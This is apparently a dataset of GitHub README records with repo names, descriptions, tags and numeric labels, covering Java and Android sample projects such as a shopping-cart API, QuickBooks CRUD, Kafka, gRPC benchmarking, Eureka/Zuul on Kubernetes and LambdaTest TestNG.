After executing two of the four commands, you can see that the cart contains the two products. You also see the total number of items and the sub-total:

```json
{
  "lineItems": [
    {
      "productId": "TTKQ8NJZ",
      "productName": "Plastic Sheeting",
      "price": {
        "currency": "EUR",
        "amount": 42.99
      },
      "quantity": 20
    },
    {
      "productId": "K3SR7PBX",
      "productName": "27-Inch Curved Computer Monitor",
      "price": {
        "currency": "EUR",
        "amount": 159.99
      },
      "quantity": 2
    }
  ],
  "numberOfItems": 22,
  "subTotal": {
    "currency": "EUR",
    "amount": 1179.78
  }
}
```

This will increase the number of plastic sheetings to 40:

```shell
curl -X POST 'localhost:8080/carts/61157/line-items?productId=TTKQ8NJZ&quantity=20' | jq
```

### Producing an Error Message

Trying to add another 20 plastic sheetings will result in an error message saying that there are only 55 items in stock:

```shell
curl -X POST 'localhost:8080/carts/61157/line-items?productId=TTKQ8NJZ&quantity=20' | jq
```

This is what the error response looks like:

```json
{
  "httpStatus": 400,
  "errorMessage": "Only 55 items in stock"
}
```

## Emptying the Cart

To empty the cart, send a DELETE command to its URL:

```shell
curl -X DELETE localhost:8080/carts/61157
```

To verify it's empty:

```shell
curl localhost:8080/carts/61157 | jq
```

You'll see an empty cart again.
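The ports-and-adapters split described above comes down to plain Java types: the application module defines a port as an interface, each adapter implements it, and bootstrap wires them together. A minimal, framework-free sketch of that wiring (all type names are hypothetical, not the repository's actual classes):

```java
import java.util.HashMap;
import java.util.Map;
import java.util.Optional;

public class PortsAndAdaptersSketch {
    record Product(String id, String name) {}

    // Outgoing port, owned by the application hexagon.
    interface ProductRepository {
        Optional<Product> findById(String id);
    }

    // In-memory adapter; a JPA-backed one could be swapped in at bootstrap time.
    static final class InMemoryProductRepository implements ProductRepository {
        private final Map<String, Product> store = new HashMap<>();
        void save(Product p) { store.put(p.id(), p); }
        @Override
        public Optional<Product> findById(String id) {
            return Optional.ofNullable(store.get(id));
        }
    }

    // Domain service depends only on the port, never on a concrete adapter.
    static final class ProductService {
        private final ProductRepository repository;
        ProductService(ProductRepository repository) { this.repository = repository; }
        String nameOf(String id) {
            return repository.findById(id).map(Product::name).orElse("unknown");
        }
    }

    public static void main(String[] args) {
        InMemoryProductRepository repo = new InMemoryProductRepository();
        repo.save(new Product("K3SR7PBX", "27-Inch Curved Computer Monitor"));
        System.out.println(new ProductService(repo).nameOf("K3SR7PBX"));
    }
}
```

Because the service only sees the interface, switching `-Dpersistence=inmemory` to `-Dpersistence=mysql` is purely a bootstrap concern.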
1
TinkerPatch/tinkerpatch-andresguard-sample
An easy TinkerPatch sample integrated with AndResGuard
null
# tinkerpatch-andresguard-sample

[ ![Download](https://api.bintray.com/packages/simsun/maven/tinkerpatch-android-sdk/images/download.svg) ](https://bintray.com/simsun/maven/tinkerpatch-android-sdk/_latestVersion)
[![Join Slack](https://slack.tinkerpatch.com/badge.svg)](https://slack.tinkerpatch.com)

An example of integrating [AndResGuard](https://github.com/shwenzhang/AndResGuard). Just copy `andresguard.gradle` into your project and add the following code to your `tinkerpatch.gradle` file:

```gradle
/**
 * Pull in the AndResGuard-related configuration
 */
project.ext {
    TP_BAKPATH = bakPath
    TP_BASEINFO = baseInfo
    TP_VARIANTNAME = variantName
}
apply from: 'andresguard.gradle'
```

If you enable resource obfuscation, the backup folder will additionally contain `*-resource_mapping.txt` and `-andresguard.apk` files. The package with the `-andresguard` suffix is the resource-obfuscated APK.

[More integration documentation](http://tinkerpatch.com/Docs/intro)
1
IntuitDeveloper/SampleApp-CRUD-Java
Java sample app to show how to define basic CRUD operations for entities available in the QuickBooks API
java java-sample quickbooks sampleapp-crud-java
[![Rate your Sample](views/Ratesample.png)][ss1][![Yes](views/Thumbup.png)][ss2][![No](views/Thumbdown.png)][ss3]

# SampleApp-CRUD-Java

<p>Welcome to the Intuit Developer's Java Sample App for CRUD operations.</p>

<p>This sample app is meant to provide working examples of how to integrate your app with the Intuit Small Business ecosystem. Specifically, this sample application demonstrates the following:</p>

<ul>
<li>Create, Read, Query, Update, Delete, Void entities.</li>
<li>All operations are performed using the QuickBooks Java SDK.</li>
</ul>

<p>Please note that while these examples work, features not called out above are not intended to be taken and used in production business applications. In other words, this is not a seed project to be taken carte blanche and deployed to your production environment.</p>

<p>For example, certain concerns are not addressed at all in our samples (e.g. security, privacy, scalability). In our sample apps, we strive to strike a balance between clarity, maintainability, and performance where we can. However, clarity is ultimately the most important quality in a sample app.</p>

<p>Therefore there are certain instances where we might forgo a more complicated implementation (e.g. caching a frequently used value, robust error handling, more generic domain model structure) in favor of code that is easier to read. In that light, we welcome any feedback that makes our sample apps easier to learn from.</p>

## Table of Contents

* [Requirements](#requirements)
* [First Use Instructions](#first-use-instructions)
* [Running the code](#running-the-code)
* [Project Structure](#project-structure)

## Requirements

In order to successfully run this sample app you need a few things:

1. Java 1.8
2. A [developer.intuit.com](http://developer.intuit.com) account
3. An app on [developer.intuit.com](http://developer.intuit.com) and the associated app token, consumer key, and consumer secret.
4. One sandbox company; connect the company with your app and generate the OAuth tokens.
5. QuickBooks Java SDK, download from [here](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22com.intuit.quickbooks-online%22) (see instructions in the "Running the code" section on how to include it)

## First Use Instructions

1. Clone the GitHub repo to your computer
2. Import the project in Eclipse or any other IDE of your choice
3. In [`config.properties`](src/main/resources/config.properties), set oauth.type as 1 or 2 depending on the type of app you have. For OAuth2 apps, set the value as 2.
4. For OAuth2 apps, fill in the [`config.properties`](src/main/resources/config.properties) file values (realmid, oauth2.accessToken).
5. For OAuth1 apps, fill in the [`config.properties`](src/main/resources/config.properties) file values (realmId, app token, consumer key, consumer secret, access token key, access token secret).
6. Run maven install.

Note: If you do not want to use Maven, just import the project and add the jars to your project externally.

## Running the code

This app is directed to provide individual sample code for CRUD operations for various QBO entities. Each class has a main method that can be run individually. The steps described below run the class for creating a customer in the Eclipse IDE.

1. Go to CustomerCreate.java in package com.intuit.developer.sampleapp.crud.entities.customer
2. Right click the file and Run as Java application
3. On the console you'll see the log being generated with the new customer id.

Follow similar steps for other classes.

Notes:

1. The sample code has been implemented for a US locale company; certain fields may not be applicable for other locales or minor versions. Care should be taken to handle such scenarios separately.
2. Before running the AttachableUpload sample, update the path of the pdf that you wish to upload to point to your local directory.

## Project Structure

**Standard Java coding structure is used for the sample app**

* Java code for CRUD operations is located under the [`entities`](src/main/java/com/intuit/developer/sampleapp/crud/entities) directory for each entity
* Java code for helper classes is located under the [`helper`](src/main/java/com/intuit/developer/sampleapp/crud/helper) directory for each entity
* Java code for the QBO DataService object is located under the [`qbo`](src/main/java/com/intuit/developer/sampleapp/crud/qbo) directory
* Config files are located in the [`resources`](src/main/resources) directory

[ss1]: #
[ss2]: https://customersurveys.intuit.com/jfe/form/SV_9LWgJBcyy3NAwHc?check=Yes&checkpoint=SampleApp-CRUD-Java&pageUrl=github
[ss3]: https://customersurveys.intuit.com/jfe/form/SV_9LWgJBcyy3NAwHc?check=No&checkpoint=SampleApp-CRUD-Java&pageUrl=github
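Independent of the QuickBooks SDK, each entity class in the sample follows the same create-then-read shape: build an entity, hand it to a data service, then look it up by the returned id. A framework-free sketch of that round trip (every name below is hypothetical — the real sample goes through the SDK's DataService against QBO):

```java
import java.util.HashMap;
import java.util.Map;
import java.util.UUID;

public class CrudSketch {
    // Minimal stand-in for a remote data service with create/read semantics.
    static final class FakeDataService {
        private final Map<String, String> customers = new HashMap<>();

        // "Create" returns the id assigned by the service.
        String add(String displayName) {
            String id = UUID.randomUUID().toString();
            customers.put(id, displayName);
            return id;
        }

        // "Read" fetches the entity back by id.
        String findById(String id) {
            return customers.get(id);
        }
    }

    public static void main(String[] args) {
        FakeDataService service = new FakeDataService();
        String id = service.add("Acme Corp"); // what CustomerCreate.java logs as the new customer id
        System.out.println(service.findById(id));
    }
}
```

Update, delete, and void follow the same pattern: send the entity (or its id) to the service and inspect the response.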
1
AudioRoute/AudioRoute-SDK
AudioRoute SDK and sample projects (Delay effect, Simple synth and Hostsample host)
null
# AudioRoute

Connect Android audio apps.

To add the AudioRoute SDK to your music app, please check the developer guide: https://audioroute.ntrack.com/developer-guide.php

Linking to the .so files is required only for host apps. Hosted apps only need to include the header files.

©2018-2019 n-Track S.r.l. Loosely based on Patchfield, written by Peter Brinkmann ©2013 Google: https://github.com/google/patchfield
1
WASdev/sample.daytrader7
The DayTrader 7 benchmark sample, which is a Java EE 7 application built around the paradigm of an online stock trading system. #JavaEE7
null
# sample.daytrader7

[![Build Status](https://travis-ci.org/WASdev/sample.daytrader7.svg?branch=master)](https://travis-ci.org/WASdev/sample.daytrader7)

# Java EE7: DayTrader7 Sample

This sample contains the DayTrader 7 benchmark, which is an application built around the paradigm of an online stock trading system. The application allows users to login, view their portfolio, look up stock quotes, and buy or sell stock shares. With the aid of a web-based load driver such as Apache JMeter, the real-world workload provided by DayTrader can be used to measure and compare the performance of Java Platform, Enterprise Edition (Java EE) application servers offered by a variety of vendors. In addition to the full workload, the application also contains a set of primitives used for functional and performance testing of various Java EE components and common design patterns.

DayTrader is an end-to-end benchmark and performance sample application. It provides a real-world Java EE workload. DayTrader's new design spans Java EE 7, including the new WebSockets specification. Other Java EE features include JSPs, Servlets, EJBs, JPA, JDBC, JSF, CDI, Bean Validation, JSON, JMS, MDBs, and transactions (synchronous and asynchronous/2-phase commit).

This sample can be installed onto WAS Liberty runtime versions 8.5.5.6 and later. A prebuilt Derby database is provided in resources/data.

To run this sample, first [download](https://github.com/WASdev/sample.daytrader7/archive/master.zip) or clone this repo - to clone:

```
git clone git@github.com:WASdev/sample.daytrader7.git
```

From inside the sample.daytrader7 directory, build and start the application in Open Liberty with the following commands:

```
mvn install
cd daytrader-ee7
mvn liberty:run
```

Once the server has been started, go to [http://localhost:9082/daytrader](http://localhost:9082/daytrader) to interact with the sample.

### To containerize the application with DB2, you can run this command:

```
docker build -t sample-daytrader7 -f Containerfile_db2 .
```

## Notice

© Copyright IBM Corporation 2015.

## License

```text
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

   http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
```
0
abhioncbr/Kafka-Message-Server
Example application based on the Apache Kafka framework to show its usage as a distributed message server. Exploring this sample application helps users understand how good and easy Apache Kafka is to use.
null
Kafka-Message-Server Example Application
========================================

Apache Kafka is yet another precious gem from the Apache Software Foundation. Kafka was originally developed at LinkedIn and later became an Apache project. Apache Kafka is a distributed publish-subscribe messaging system. Kafka differs from traditional messaging systems in that it is designed as a distributed system, persists messages on disk, and supports multiple subscribers.

Kafka-Message-Server is a sample application for demonstrating Kafka usage as a message server. Please follow the instructions below for productive use of the sample application.

1. Download the Apache Kafka version 0.8.0 zip file from the Kafka download page and extract it.
2. There is no need to set up Hadoop or ZooKeeper on your system. You can use the ZooKeeper startup script present in the bin folder of Kafka.
3. For the execution of the sample application, copy 'kafka-message-server-example-0.8.0.jar' into the Kafka folder where 'kafka_2.8.0-0.8.0.jar' is present. The sample application depends on 'commons-cli-1.1.jar'; copy 'commons-cli-1.1.jar' into the 'libs' folder of Apache Kafka.
4. Copy the following scripts from the 'Kafka-Message-Server-Example/config' folder into the 'bin' folder of Kafka, and give them execution permission using the chmod command:
   a) java-mail-content-producer.sh
   b) java-mail-consumer-demo.sh
   c) java-mail-producer-consumer-demo.sh
   d) java-mail-producer-demo.sh
5. Start the ZooKeeper server using the command - bin/zookeeper-server-start.sh config/zookeeper.properties
6. Start the Kafka server using the command - bin/kafka-server-start.sh config/server.properties
7. Start the mail content creation program using the command - bin/java-mail-content-producer.sh -path [directory-path]
8. Start the message server mail producer using the command - bin/java-mail-producer-demo.sh -path [same directory path given above] -topic [topic name]
9. Start the message server mail consumer using the command - bin/java-mail-consumer-demo.sh -topic [same topic name given above]
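Conceptually, the mail producer and consumer started above interact through topic-based publish-subscribe: producers publish to a named topic, and every subscriber of that topic receives each message. Stripped of Kafka itself (no broker, no persistence, no partitions), the interaction can be sketched with JDK queues; all names here are illustrative, not the sample's actual classes:

```java
import java.util.List;
import java.util.Map;
import java.util.concurrent.BlockingQueue;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.CopyOnWriteArrayList;
import java.util.concurrent.LinkedBlockingQueue;

public class TopicSketch {
    // One queue per subscriber per topic. Kafka additionally persists
    // messages on disk and splits each topic into partitions.
    static final Map<String, List<BlockingQueue<String>>> topics = new ConcurrentHashMap<>();

    static BlockingQueue<String> subscribe(String topic) {
        BlockingQueue<String> q = new LinkedBlockingQueue<>();
        topics.computeIfAbsent(topic, t -> new CopyOnWriteArrayList<>()).add(q);
        return q;
    }

    static void publish(String topic, String message) {
        // Fan out: every subscriber of the topic gets its own copy.
        topics.getOrDefault(topic, List.of()).forEach(q -> q.add(message));
    }

    public static void main(String[] args) throws InterruptedException {
        BlockingQueue<String> consumer = subscribe("mail");
        publish("mail", "Subject: hello");
        System.out.println(consumer.take());
    }
}
```

Unlike this in-memory sketch, Kafka decouples producers and consumers across processes and machines, which is what the shell scripts above demonstrate.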
1
recepinanc/spring-boot-grpc-benchmarking
A sample project to experiment with gRPC and Spring Boot together
benchmarking grpc grpc-java jmeter rest spring spring-boot
# Spring Boot and gRPC Benchmarking This project compares the performances of gRPC + Protocol Buffers and REST + JSON. The comparison is made under certain conditions which we discuss in more detail in the ***Benchmarking*** section below. Because this experiment is conducted on my local machine, I accept that it just demonstrates their **performances relative to each other**. <br/> # 📝 What I learned? ✏️ Differences **between gRPC and REST**. ✏️ The theory behind **gRPC** and **Protocol Buffer**. ✏️ Setup a simple **gRPC** **Server** and **Client**. ✏️ Make use of **protocol buffers** for **code generation**. ✏️ Integrate **REST APIs** with **Protocol Buffers**. ✏️ Do **benchmarking** with **JMeter**. <br/> # 🛠Project Structures ![sample_grpc_project_architecture](https://github.com/recepinanc/spring-boot-grpc-benchmarking/blob/main/sample_grpc_project_architecture.png) *Single Spring Boot client backed by a GRPC and a Spring Boot Servers.* <br/> ## sample-client A Spring Boot project that accepts JSON and Protocol Buffer responses. **Port:** 5000 <br/> **Endpoints** ``` // REST /rest/randomNumbers?count={n} -> Generates {n} random numbers as JSON List /rest/largeObjects?count={n} -> Generates {n} LargeObjects as Protocol Buffer Object /rest/largeObjects/json?count={n} -> Generates {n} LargeObjectPOJOs as JSON List // GRPC /grpc/randomNumbers?count={n} -> Generates {n} random numbers as Protocol Buffer Object /grpc/largeObjects?count={n} -> Generates {n} LargeObjects as Protocol Buffer Object ``` - `/rest/**` calls are handled by `sample-springboot-server` - `/grpc/**` calls are handled by `sample-grpc-server` > This project has `sample-grpc-codegen` as dependency in its `pom.xml`. <br/> ## sample-springboot-server <br/> A basic Spring Boot project. 
**Port:** 4000 <br/> **Endpoints** ``` /rest/randomNumbers?count={n} -> Generates {n} random numbers as JSON List /rest/largeObjects?count={n} -> Generates {n} LargeObjects as Protocol Buffer Object /rest/largeObjects/json?count={n} -> Generates {n} LargeObjectPOJOs as JSON List ``` <br/> ## sample-grpc-server <br/> A basic gRPC Server. **Port:** 3000 <br/> **Endpoints** ``` /grpc/randomNumbers?count={n} -> Generates {n} random numbers as Protocol Buffer Object /grpc/largeObjects?count={n} -> Generates {n} LargeObjects as Protocol Buffer Object ``` <br/> > This project has `sample-grpc-codegen` as dependency in its `pom.xml`. <br/> ## sample-grpc-codegen <br/> This project is the gist of the gRPC part of the main project. The sole purpose of this project is to generate the code based on the given Protobuff file to enable the Server (*sample-grpc-server*) and the Client (*sample-client*) to make Remote Procedure Calls (RPC) as if the methods they call are local methods. For this project, there's a `Sample.proto` and a `LargeObject.proto` file located under `/src/proto/`. With the help of plugins, whenever the project is compiled and installed, it generates the required code (hence we call it ***codegen***) under `/targets/generated-sources` folder. <br/> # ⏱ Benchmarking This benchmarking compares the **performances** of **"gRPC with Protocol Buffers"** against **"REST with JSON"** during **data transportation**. <br/> ## Motivation As we are all witnessing the world moving towards the microservices architecture, gRPC's popularity is on the rise. It is mainly because it is said to be more performant than REST and its drawbacks are somewhat negligible if we are planning to use it to design our internal APIs. So, I wanted to experiment with the implementation of such API, its interaction with other frameworks and, its performance compared to REST APIs using JMeter. 
## Setup

Compared to JSON (commonly used in REST APIs as the transfer format), Protocol Buffers offer a great performance improvement thanks to the way the data is represented during transportation. HTTP/1.1 with JSON is text-based communication, whereas with gRPC and Protocol Buffers we can make use of HTTP/2 and transport our data in binary format, which helps increase performance and throughput.

> *Disclaimer: These benchmarking tests ignore throughput comparisons - for now - and focus on the difference in latency.*

To clearly see the effects of using Protocol Buffers, I created a really big object both as a proto message and as a Java object, named `LargeObject` and `LargeObjectPOJO` respectively, and tested the APIs by fetching instances of this object at different sizes, as set per endpoint with the `count` parameter.

### Constraints

To focus directly on the performance of data transportation and serialization/deserialization, the benchmarking setup has the following constraints:

- No database connection
- No business logic
- No logging

To remove the effects of generating the `LargeObjectResponse` (proto object) and `LargeObjectPOJO` (Java object), I run the *"SetUp Thread Group"* first and let the **servers generate the objects** and **cache** them. This way I can **focus only on the performance of both the gRPC and REST approaches during data transportation**.

### Test Scenarios

The test scenarios fall into two categories: setup and actual tests.

#### SetUp Thread Group

The SetUp Thread Group's main purpose is to trigger all endpoints individually, so that the data the other test scenarios will ask for is generated and cached by the servers before it is requested.

#### Actual Test Thread Groups

- The test plan scenarios start from **1 user and ramp up to 100 users in 10 seconds** *(10 new users per second)*.
- The same test plan is run for both **REST** and **gRPC**.
- There are 6 thread groups in total, **3 for REST** and **3 for gRPC**.
- Each protocol is tested against 1, 100, and 1000 *LargeObjects* to measure the performance differences with respect to input size.
- Thread groups are executed sequentially *(one thread group runs at a time)*.

## 📊 Results

![collage](https://github.com/recepinanc/spring-boot-grpc-benchmarking/blob/main/benchmarking/response-time-graphs/collage.png)

With larger amounts of data, **gRPC and Protobuf** clearly outperform **REST and JSON**!

**Key takeaway**

*"REST might be a better choice for public-facing API designs, while gRPC can be used for internal APIs."*

# 📒 References

gRPC official website: https://grpc.io/
API design: https://cloud.google.com/apis/design/resources
gRPC vs OpenAPI vs REST APIs: https://cloud.google.com/blog/products/api-management/understanding-grpc-openapi-and-rest-and-when-to-use-them
Web API design guidelines: https://pages.apigee.com/web-api-design-register.html
gRPC vs OpenAPI: https://medium.com/apis-and-digital-transformation/openapi-and-grpc-side-by-side-b6afb08f75ed
HTTP/2's effect on gRPC: https://dev.to/techschoolguru/http-2-the-secret-weapon-of-grpc-32dk
Great example of how to use gRPC/Protobuf/JSON: https://www.kabisa.nl/tech/sending-data-to-the-other-side-of-the-world-json-protocol-buffers-rest-grpc/
gRPC in Java: https://blog.j-labs.pl/grpc-in-java
Slack API - a great example of an RPC API design: https://api.slack.com/methods#conversations
1
felipemeriga/Eureka-Zuul-Kubernetes
This is a sample of how to deploy a eureka server using zuul gateway in Kubernetes(EKS)
null
Spring Boot Zuul - Eureka - Kubernetes
------------------------------------------
This example demonstrates the main features of the Zuul API gateway integrated into Spring Cloud:<br>
• Service auto-registration via Eureka<br>
• Service registration by address<br>
• Service registration by service ID<br>
• Filters (logging, authentication)<br>
• Serving static content<br>
• Service response aggregation through Zuul<br><br>
Technology used: <br>
• Spring Boot 1.5.3.RELEASE<br>
• Eureka Service Discovery Client<br>
• Zuul API Gateway<br><br>

## Project Contents

This project contains 4 modules, each with its own configuration for deployment:

- **Eureka-Server:** The main Eureka server. This is the service discovery application; all the other services register with this server. For deploying it in Kubernetes, be sure that you have a very stable network environment, which is why this module uses a k8s StatefulSet.
- **Account-Service:** A simple Spring Boot REST service that connects to the Eureka server, enabling other services to discover and reach it.
- **Zuul-Server:** Zuul is the API gateway, which can be used either as a load balancer or as a gateway that distributes traffic to your services. As a security best practice, expose only the gateway to the client when deploying microservices, to control traffic and network distribution. You can also use Zuul for authentication, applying filters and other credential mechanisms.
- **Feign-Service:** Another simple Spring Boot REST service, included to show communication between services: an HTTP GET request to */node/feign* calls a method from account-service.

## Environments

Currently there are dev and prod profiles. The dev profile is for running everything on localhost, ideally with an IDE such as IntelliJ IDEA. The prod profile is for deploying to Kubernetes.
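For the dev profile, a Eureka client typically points at the local server through a configuration along these lines. This is a hypothetical sketch; the property values and file names in the actual modules may differ:

```yaml
# application-dev.yml (illustrative; check each module for the real values)
spring:
  application:
    name: account-service

eureka:
  client:
    service-url:
      defaultZone: http://localhost:8761/eureka/
  instance:
    prefer-ip-address: true
```

The prod profile would swap `defaultZone` for the in-cluster Eureka address, which is where the stable DNS names provided by a StatefulSet become useful.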
### Deploying to Kubernetes

For deploying to Kubernetes, each module has a Dockerfile for creating a Docker image. The commands for building the images are:

- ***Account-Service:*** docker build -t <docker-hub-username>/account-service:latest .
- ***Zuul-Server:*** docker build -t <docker-hub-username>/zuul-server:latest .
- ***Eureka-Server:*** docker build -t <docker-hub-username>/eureka-server:latest .
- ***Feign-Service:*** docker build -t <docker-hub-username>/feign-service:latest .

After you build an image, you can push it with the command:

docker push <docker-hub-username>/<service-name>

In the deployment.yml file, which is used for creating the deployment and service in the Kubernetes cluster, change the image names to those of the pushed Docker images. After changing the image names, deploy to Kubernetes with the command:

kubectl apply -f deployment

---

### Running the project locally

1. Extract the archive and you will find four Maven projects
2. Run all the projects with mvn install -DskipTests

Access the two microservices through the API gateway zuul-server (http://localhost:9090):

http://localhost:9090/api/account-service/account/login

http://localhost:9090/api/node-service/node/1

Service discovery through the URL: http://localhost:8761/

## Some points:

* The Eureka server application must be deployed in a very stable network environment, and a Kubernetes StatefulSet helps in ensuring a stable network; in your Kubernetes file, have a section for the service and another for the StatefulSet. Also, a StatefulSet gives you DNS names that point to pods, so you can hardcode them, making it easier to put the Eureka server URL in the client configuration file.
* For security reasons you can set the service of the deployed microservices as NodePort or ClusterIP instead of LoadBalancer, because the gateway handles redirection to the services.

## Kubernetes Service differences:

* ***ClusterIP:*** The default type; it exposes a service so that other apps inside the cluster can access it.
* ***NodePort:*** Opens a specific port on all the nodes (instances); all requests to those ports are redirected to the service, which redirects to the pods.

![alt text](images/nodeport.png)

* ***LoadBalancer:*** The most standard way of exposing a service to the internet. If you are using an EKS cluster, when you create a LoadBalancer it is provisioned in the AWS console, and it distributes traffic to the service, which reaches the pods.

![alt text](images/loadbalancer.png)

Kubernetes has three object types you should know about:

* ***Pods:*** run one or more closely related containers
* ***Services:*** set up networking in a Kubernetes cluster
* ***Deployments:*** maintain a set of identical pods, ensuring that they have the correct config and that the right number of them exist

* ***Pods:***
  * Run a single set of containers
  * Good for one-off dev purposes
  * Rarely used directly in production
* ***Deployments:***
  * Run a set of identical pods
  * Monitor the state of each pod, updating as necessary
  * Good for dev
  * Good for production

---

Links followed for design:

http://microservices.io/patterns/microservices.html

https://dzone.com/articles/spring-cloud-netflix-zuul-edge-serverapi-gatewayga

https://www.nginx.com/blog/building-microservices-using-an-api-gateway/
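The StatefulSet-plus-headless-Service pattern recommended above for the Eureka server can be sketched as follows. The names, image, and replica count are illustrative assumptions, not taken from the repository's deployment files:

```yaml
# Illustrative sketch of a headless Service + StatefulSet for Eureka.
apiVersion: v1
kind: Service
metadata:
  name: eureka
spec:
  clusterIP: None          # headless: gives each pod a stable DNS name
  selector:
    app: eureka
  ports:
    - port: 8761
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: eureka
spec:
  serviceName: eureka      # pods become eureka-0.eureka, eureka-1.eureka, ...
  replicas: 2
  selector:
    matchLabels:
      app: eureka
  template:
    metadata:
      labels:
        app: eureka
    spec:
      containers:
        - name: eureka-server
          image: <docker-hub-username>/eureka-server:latest
          ports:
            - containerPort: 8761
```

With this in place, clients can hardcode a URL such as `http://eureka-0.eureka:8761/eureka/` in their configuration, which is exactly the stable-DNS advantage of a StatefulSet mentioned above.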
1
LambdaTest/java-testng-selenium
Run TestNG and Selenium scripts on LambdaTest automation cloud. A sample repo to help you run TestNG framework based test scripts in parallel with LambdaTest
automation automation-testing cloud example examples java lambdatest selenium selenium-grid selenium-webdriver selenium4 test-automation testing testng
# Run Selenium Tests With TestNG On LambdaTest

![image](https://user-images.githubusercontent.com/70570645/171934563-4806efd2-1154-494c-a01d-1def95657383.png)

<p align="center">
  <a href="https://www.lambdatest.com/blog/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium" target="_blank">Blog</a>
  &nbsp; &#8901; &nbsp;
  <a href="https://www.lambdatest.com/support/docs/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium" target="_blank">Docs</a>
  &nbsp; &#8901; &nbsp;
  <a href="https://www.lambdatest.com/learning-hub/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium" target="_blank">Learning Hub</a>
  &nbsp; &#8901; &nbsp;
  <a href="https://www.lambdatest.com/newsletter/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium" target="_blank">Newsletter</a>
  &nbsp; &#8901; &nbsp;
  <a href="https://www.lambdatest.com/certification/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium" target="_blank">Certifications</a>
  &nbsp; &#8901; &nbsp;
  <a href="https://www.youtube.com/c/LambdaTest" target="_blank">YouTube</a>
</p>

*Learn how to use the TestNG framework to configure and run your Java automation testing scripts on the LambdaTest platform*

[<img height="58" width="200" src="https://user-images.githubusercontent.com/70570645/171866795-52c11b49-0728-4229-b073-4b704209ddde.png">](https://accounts.lambdatest.com/register?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium)

## Table Of Contents

* [Pre-requisites](#pre-requisites)
* [Run Your First Test](#run-your-first-test)
* [Parallel Testing With TestNG](#executing-parallel-tests-using-testng)
* [Local Testing With TestNG](#testing-locally-hosted-or-privately-hosted-projects)

## Pre-requisites

Before you can start performing Java automation testing with Selenium, you would need to:

- Install the latest **Java development environment**, i.e. **JDK 1.6** or higher. We recommend using the latest version.
- Download the latest **Selenium Client** and its **WebDriver bindings** from the [official website](https://www.selenium.dev/downloads/). The latest versions of the Selenium Client and WebDriver are ideal for running your automation scripts on the LambdaTest Selenium cloud grid.
- Install **Maven**, which supports the **TestNG** framework out of the box. **Maven** can be downloaded and installed following the steps on [the official website](https://maven.apache.org/). Maven can also be installed easily on **Linux/macOS** using the [Homebrew](https://brew.sh/) package manager.

### Cloning Repo And Installing Dependencies

**Step 1:** Clone LambdaTest’s Java-TestNG-Selenium repository and navigate to the code directory as shown below:

```bash
git clone https://github.com/LambdaTest/Java-TestNG-Selenium
cd Java-TestNG-Selenium
```

You can also run the command below to check for outdated dependencies.

```bash
mvn versions:display-dependency-updates
```

### Setting Up Your Authentication

Make sure you have your LambdaTest credentials with you to run test automation scripts. You can get these credentials from the [LambdaTest Automation Dashboard](https://automation.lambdatest.com/build?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium) or from your [LambdaTest Profile](https://accounts.lambdatest.com/login?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium).

**Step 2:** Set your LambdaTest **Username** and **Access Key** in environment variables.
* For **Linux/macOS**:

```bash
export LT_USERNAME="YOUR_USERNAME"
export LT_ACCESS_KEY="YOUR ACCESS KEY"
```

* For **Windows**:

```bash
set LT_USERNAME="YOUR_USERNAME"
set LT_ACCESS_KEY="YOUR ACCESS KEY"
```

## Run Your First Test

>**Test Scenario**: The sample [TestNGTodo1.java](https://github.com/LambdaTest/Java-TestNG-Selenium/blob/master/src/test/java/com/lambdatest/TestNGTodo1.java) tests a sample to-do list app by marking a couple of items as done, adding a new item to the list, and finally displaying the count of pending items as output.

### Configuring Your Test Capabilities

**Step 3:** In the test script, you need to update your test capabilities. In this code, we pass the browser, browser version, and operating system information, along with LambdaTest Selenium grid capabilities, via the capabilities object. The capabilities object in the above code is defined as:

```java
DesiredCapabilities capabilities = new DesiredCapabilities();
capabilities.setCapability("browserName", "chrome");
capabilities.setCapability("version", "70.0");
capabilities.setCapability("platform", "win10"); // If this cap isn't specified, it will just get any available one
capabilities.setCapability("build", "LambdaTestSampleApp");
capabilities.setCapability("name", "LambdaTestJavaSample");
```

You can generate capabilities for your test requirements with the help of our inbuilt [Desired Capability Generator](https://www.lambdatest.com/capabilities-generator/?utm_source=github&utm_medium=repo&utm_campaign=Java-TestNG-Selenium).

### Executing The Test

**Step 4:** The tests can be executed in the terminal using the following command.

```bash
mvn test -D suite=single.xml
```

Your test results will be displayed on the test console (or command-line interface if you are using terminal/cmd) and on the LambdaTest automation dashboard.
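The credentials from Step 2 and the capabilities from Step 3 come together when a test creates a `RemoteWebDriver` against the LambdaTest hub. A minimal sketch of how the grid URL is typically assembled from the environment variables (the hub host is based on LambdaTest's public docs, and the class name here is hypothetical; the actual sample classes in the repo may differ):

```java
// Hypothetical sketch: assembles the LambdaTest grid URL from the
// LT_USERNAME / LT_ACCESS_KEY environment variables set in Step 2.
public class GridUrlBuilder {

    static String buildGridUrl(String username, String accessKey) {
        // hub.lambdatest.com is LambdaTest's public Selenium hub host
        return "https://" + username + ":" + accessKey + "@hub.lambdatest.com/wd/hub";
    }

    public static void main(String[] args) {
        // Fall back to placeholders when the env vars are not set.
        String user = System.getenv().getOrDefault("LT_USERNAME", "demo-user");
        String key = System.getenv().getOrDefault("LT_ACCESS_KEY", "demo-key");
        String url = buildGridUrl(user, key);
        System.out.println(url);
        // In a real test this URL would be passed to:
        //   new RemoteWebDriver(new URL(url), capabilities);
    }
}
```

Keeping the credentials in environment variables, as the README suggests, means this URL never has to be committed to source control.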
## Run Parallel Tests Using TestNG

Here is an example `xml` file which helps you run a single test on various browsers at the same time. You would also need to write a test case that makes use of **TestNG** framework parameters (`org.testng.annotations.Parameters`).

```xml title="testng.xml"
